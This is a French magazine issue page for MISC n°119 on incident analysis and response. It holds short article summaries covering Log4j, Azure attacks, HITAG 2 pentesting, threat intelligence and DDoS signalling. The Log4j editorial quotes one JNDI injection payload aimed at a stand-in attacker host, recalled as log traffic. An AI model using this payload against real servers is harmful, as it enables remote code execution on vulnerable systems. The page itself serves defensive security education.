MISC N°
Numéro
119

Outils et méthodes pour l’analyse et la réponse à incident

Temporalité
Janvier/Février 2022
Image v3
Outils et méthodes pour l’analyse et la réponse à incident
Article mis en avant

Résumé

Dans le cadre de l’amélioration du niveau de maturité de la gestion de la sécurité des systèmes d’information, il convient d'appréhender correctement les menaces. Si certaines d’entre elles sont génériques et communes à l’ensemble des organisations, d’autres vont cibler plus spécifiquement certaines typologies d’entreprises ou administrations. Typiquement, une banque, une société de e-commerce, un hôpital ou le ministère de la Défense ne vont pas faire l’objet de la même typologie d’attaquants ni du même outillage. Par conséquent, les IOC à rechercher en priorité sur vos infrastructures devront être adaptées à moins de rapidement épuiser vos forces.

Dans ce numéro...


Nous nous souviendrons tous un moment de ce vendredi après-midi quand les premières annonces sur log4j sont arrivées et que nous avons tous vu dans nos logs se multiplier les “${jndi:ldap://mechanthacker.com/a}” en l’espace de quelques minutes. Pour beaucoup d’entre nous, le week-end a été long, une course contre la montre pour éviter de se retrouver avec un système d’information ressemblant à un champ de ruines le lundi matin, ou tout aussi probablement une ferme de minage de cryptomonnaies. Une caractéristique particulière de cette faille a certainement été le niveau de massification des attaques en l’espace de quelques heures. Tout serveur accessible sur les ports 80 et 443, même non référencé par les moteurs de recherche s’est retrouvé attaqué depuis des adresses IP multiples dès vendredi après-midi. Il est probable que certains groupes de pirates disposent d’ores et déjà d’une grande quantité de serveurs compromis qu’ils pourront monétiser dans un second temps, par exemple avec des campagnes de ransomware.
Les infrastructures cloud, et notamment Azure, possèdent souvent des interfaces exposées sur Internet pouvant constituer des portes d’entrée sur ces environnements. L’objectif de cet article est de montrer dans quelle mesure un attaquant serait capable de s’introduire au sein d’un environnement Azure suite à la compromission d’une interface publique et d’y élever ses privilèges afin d’accéder à des ressources sensibles.
Cet article résume les possibilités d'attaque de cartes d'accès HITAG 2 en situation de pentest réel et dans leurs trois modes de fonctionnement. Il distille en un seul endroit les principales choses à savoir, et tous les petits détails publics, mais éparpillés au gré d'heures de conférences vidéo, de notes de révision, ou de pratique de terrain. Un pentest HITAG 2 à préparer ? Ce qui suit devrait vous mettre sur les bons rails, et vous éviter les principaux écueils.
La première édition de l’European Cyber Cup a eu lieu les 8 et 9 septembre à l’occasion du Forum International de la Cybersécurité 2021, avec notamment une épreuve de détection automatisée des insider attacks. Retour sur le fonctionnement de l’IA de mon équipe qui a remporté la médaille d’or.
Le renseignement sur les menaces, ou Cyber Threat Intel, est un domaine où il est facile de se perdre tant les sources, méthodes et outils sont nombreux. Dans ce dossier, nous nous efforçons de vous donner les clés pour démarrer avec des outils libres sans perdre pied.
Recueillir et utiliser des informations liées aux menaces informatiques n'est pas chose aisée ; les standardiser et les partager est encore plus difficile. L'outil libre de renseignements sur les menaces MISP a été conçu afin de faciliter ces aspects complexes et pourtant si essentiels de nos jours. Dans cet article, nous explorons les principaux concepts et fonctionnalités qui ont fait la popularité de la plateforme auprès des analystes en cybersécurité.
Le flux continu de nouveaux logiciels est une source de difficultés pour les examens forensiques. Pour pallier ce défi, le projet hashlookup réduit la charge de travail de l’analyste en accélérant la vitesse de dissection.
Cet article s'inscrit dans la continuation d'une série d'articles sur les artefacts bas niveau que l'on peut rencontrer dans un binaire compilé à partir de sources en C++. Cet épisode aborde (enfin !) un des morceaux les plus indigestes de la traduction de C++ en assembleur : la gestion d'exceptions sous Linux, suivant la spécification dite Itanium.
Les attaques DDOS sont omniprésentes ; relativement simples à réaliser, elles peuvent causer d’importants préjudices notamment financiers. Bien que la complexité de ces attaques évolue, les contre-mesures évoluent elles aussi. DOTS (DDOS Open Threat Signaling) [1] est un protocole de signalement de l'IETF pour actionner une réponse à un évènement comme une mitigation d'attaque DDOS, que nous démontrons dans cet article.
Dans cet article, nous aborderons la question de la difficulté de travailler en équipe lors de pentests puis nous vous présenterons l’outil que nous avons développé afin de pallier ce problème.

Magazines précédents

Les derniers articles Premiums

Les derniers articles Premium

Donnez une autre dimension à vos logs avec Vector

Magazine
Marque
Contenu Premium
Spécialité(s)
Résumé

Avoir des informations précises et détaillées sur ce qu’il se passe dans une infrastructure, et sur les applications qu'elle héberge est un enjeu critique pour votre business. Cependant, ça demande du temps, temps qu'on préfère parfois se réserver pour d'autres tâches jugées plus prioritaires. Mais qu'un système plante, qu'une application perde les pédales ou qu'une faille de sécurité soit découverte et c'est la panique à bord ! Alors je vous le demande, qui voudrait rester aveugle quand l'observabilité a tout à vous offrir ?

Du graphisme dans un terminal ? Oui, avec sixel

Magazine
Marque
Contenu Premium
Spécialité(s)
Résumé

On le voit de plus en plus, les outils en ligne de commandes s'étoffent peu à peu d'éléments graphiques sous la forme d'émojis UTF8. Plus qu'une simple décoration, cette pointe de « graphisme » dans un monde de texte apporte réellement un plus en termes d'expérience utilisateur et véhicule, de façon condensée, des informations utiles. Pour autant, cette façon de sortir du cadre purement textuel d'un terminal n'est en rien une nouveauté. Pour preuve, fin des années 80 DEC introduisait le VT340 supportant des graphismes en couleurs, et cette compatibilité existe toujours...

Game & Watch : utilisons judicieusement la mémoire

Magazine
Marque
Contenu Premium
Spécialité(s)
Résumé

Au terme de l'article précédent [1] concernant la transformation de la console Nintendo Game & Watch en plateforme de développement, nous nous sommes heurtés à un problème : les 128 Ko de flash intégrés au microcontrôleur STM32 sont une ressource précieuse, car en quantité réduite. Mais heureusement pour nous, le STM32H7B0 dispose d'une mémoire vive de taille conséquente (~ 1,2 Mo) et se trouve être connecté à une flash externe QSPI offrant autant d'espace. Pour pouvoir développer des codes plus étoffés, nous devons apprendre à utiliser ces deux ressources.

Body